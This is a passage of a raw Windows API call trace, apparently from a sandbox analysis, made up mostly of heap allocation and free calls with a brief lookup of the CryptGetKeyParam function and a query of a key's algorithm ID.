Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.503] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0182.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0182.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.505] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0182.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.507] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0182.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0182.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0182.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0182.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0182.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0182.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.512] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0182.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.513] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.514] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0182.514] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.514] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | 